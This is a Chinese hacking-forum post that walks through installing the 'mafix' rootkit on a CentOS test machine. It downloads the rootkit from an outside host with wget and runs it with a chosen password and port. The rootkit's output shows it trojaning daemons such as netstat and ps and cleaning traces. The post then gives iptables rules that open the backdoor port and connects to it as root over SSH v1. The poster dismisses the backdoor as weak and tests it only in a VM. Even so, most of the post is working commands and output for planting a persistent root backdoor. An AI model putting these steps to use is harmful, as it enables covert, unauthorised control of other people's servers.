切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
372 替换型后门 mafix Ssh v1[复制链接]
发表于 2012-12-10 18:58:15 | 显示全部楼层 |!read_mode!

垃圾后门最好别使用

算很简单 先备份CENTOS 用完后恢复

  1. [root@Centos tmp]# wget http://lucky.fuzzexp.org/file/r00tk1t/mafix.tar_shit.gz
  2. [root@Centos tmp]# cd mafix
复制代码

关于安装 最好先777

  1. [root@Centos mafix]# chmod -R 777 *
复制代码

执行主持续 ./root 密码 端口


  1. [root@Centos mafix]# ./root helen 10086
  2.       ___           ___           ___                     ___     
  3.      /__/\         /  /\         /  /\      ___          /__/|   
  4.     |  |::\       /  /::\       /  /:/_    /  /\        |  |:|   
  5.     |  |:|:\     /  /:/\:\     /  /:/ /\  /  /:/        |  |:|   
  6.   __|__|:|\:\   /  /:/~/::\   /  /:/ /:/ /__/::\      __|__|:|   
  7. /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/  \__\/\:\__  /__/::::\____
  8. \  \:\~~\__\/ \  \:\/:/__\/ \  \:\/:/      \  \:\/\    ~\~~\::::/
  9.   \  \:\        \  \::/       \  \::/        \__\::/     |~~|:|~~
  10.    \  \:\        \  \:\        \  \:\        /__/:/      |  |:|   
  11.     \  \:\        \  \:\        \  \:\       \__\/       |  |:|   
  12.      \__\/         \__\/         \__\/                   |__|/   

  13.                 - the ferrari of rootkits -
  14. mafix! >  extracting libs...
  15. mafix! >  backdooring box...
  16. mafix! >  no remote logging found...
  17. mafix! >  no tripwire was detected..
  18. mafix! >  installing trojans...
  19. mafix! >  hold on...
  20. mafix! >  Password: helen
  21. mafix! >  Port: 10086
  22. mafix! >  backdoored some daemons (netstat, ps)
  23. mafix! >  checking for some vuln daemons....
  24. mafix! >  RPC.STATD FOUND! PATCH IT!
  25. mafix! >  sysinfo:
  26. hostname: 未知的主机
  27. mafix! > hostname :  (5.5.5.6)
  28. mafix! > arch: 2012 -+- bogomips : 5976.92 '
  29. hostname: 未知的主机
  30. mafix! > alternative ip:   -+-  Might be [1 ] active adapters.
  31. mafix! > dist:  CentOS release 5.5 (Final)
  32. mafix! > cleaning up some traces... done!


  33.       ___           ___           ___                     ___     
  34.      /__/\         /  /\         /  /\      ___          /__/|   
  35.     |  |::\       /  /::\       /  /:/_    /  /\        |  |:|   
  36.     |  |:|:\     /  /:/\:\     /  /:/ /\  /  /:/        |  |:|   
  37.   __|__|:|\:\   /  /:/~/::\   /  /:/ /:/ /__/::\      __|__|:|   
  38. /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/  \__\/\:\__  /__/::::\____
  39. \  \:\~~\__\/ \  \:\/:/__\/ \  \:\/:/      \  \:\/\    ~\~~\::::/
  40.   \  \:\        \  \::/       \  \::/        \__\::/     |~~|:|~~
  41.    \  \:\        \  \:\        \  \:\        /__/:/      |  |:|   
  42.     \  \:\        \  \:\        \  \:\       \__\/       |  |:|   
  43.      \__\/         \__\/         \__\/                   |__|/   

  44.                                   Password: helen                                       
  45.                                      Port: 10086                                       
  46. [root@Centos mafix]#
复制代码

然后开放防火墙 你设置的端口


  1. [root@Centos mafix]# iptables -A INPUT -p tcp -s 0/0 --dport 10086 -j ACCEPT
  2. [root@Centos mafix]# iptables -A OUTPUT -p tcp --sport 10086 -m state --state ESTABLISHED -j ACCEPT
  3. [root@Centos mafix]# iptables-save > /etc/sysconfig/iptables
复制代码

查看监听


  1. brk<~> $ nc 5.5.5.6 10086
  2. SSH-1.5-2.0.13
复制代码

SSH的版本太低了然后链接 使用SSH V1 密码久是你设定的密码 HELEN

  1. brk<~> $ ssh root@5.5.5.6 -p10086 -1
  2. The authenticity of host '[5.5.5.6]:10086 ([5.5.5.6]:10086)' can't be established.
  3. RSA1 key fingerprint is dc:cd:da:72:fe:6e:db:70:ff:11:e5:cc:b4:27:80:80.
  4. Are you sure you want to continue connecting (yes/no)? yes
  5. Warning: Permanently added '[5.5.5.6]:10086' (RSA1) to the list of known hosts.
  6. root@5.5.5.6's password:
  7. Last login: Mon Nov 26 14:31:05 2012 from 5.5.5.1

  8.       ___           ___           ___                     ___     
  9.      /__/\         /  /\         /  /\      ___          /__/|   
  10.     |  |::\       /  /::\       /  /:/_    /  /\        |  |:|   
  11.     |  |:|:\     /  /:/\:\     /  /:/ /\  /  /:/        |  |:|   
  12.   __|__|:|\:\   /  /:/~/::\   /  /:/ /:/ /__/::\      __|__|:|   
  13. /__/::::| \:\ /__/:/ /:/\:\ /__/:/ /:/  \__\/\:\__  /__/::::\____
  14. \  \:\~~\__\/ \  \:\/:/__\/ \  \:\/:/      \  \:\/\    ~\~~\::::/
  15.   \  \:\        \  \::/       \  \::/        \__\::/     |~~|:|~~
  16.    \  \:\        \  \:\        \  \:\        /__/:/      |  |:|   
  17.     \  \:\        \  \:\        \  \:\       \__\/       |  |:|   
  18.      \__\/         \__\/         \__\/                   |__|/   

  19. root@maf!x:/root$
复制代码

查看端口隐藏
端口没有隐藏
  1. root@maf!x:/root$ netstat -antp
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
  4. tcp        0      0 0.0.0.0:10086               0.0.0.0:*                   LISTEN      2449/ttyload        
  5. tcp        0      0 0.0.0.0:111                 0.0.0.0:*                   LISTEN      1807/portmap        
  6. tcp        0      0 0.0.0.0:753                 0.0.0.0:*                   LISTEN      1843/rpc.statd      
  7. tcp        0      0 127.0.0.1:631               0.0.0.0:*                   LISTEN      2114/cupsd         
  8. tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      2153/sendmail: acce
  9. tcp        0      0 5.5.5.6:10086               5.5.5.1:41273               ESTABLISHED 2660/ttyload        
  10. tcp        0      0 :::22                       :::*                        LISTEN      2653/sshd           
  11. tcp        0      0 ::ffff:5.5.5.6:22           ::ffff:5.5.5.1:52552        ESTABLISHED 2350/0              
  12. root@maf!x:/root$
复制代码

文件也没隐藏
  1. root@maf!x:/root$ file /lib/lidps1.so
  2. /lib/lidps1.so: ASCII text
  3. root@maf!x:/root$
复制代码

小心使用。。。 垃圾后门 好了 恢复虚拟机备份



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 06:10

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部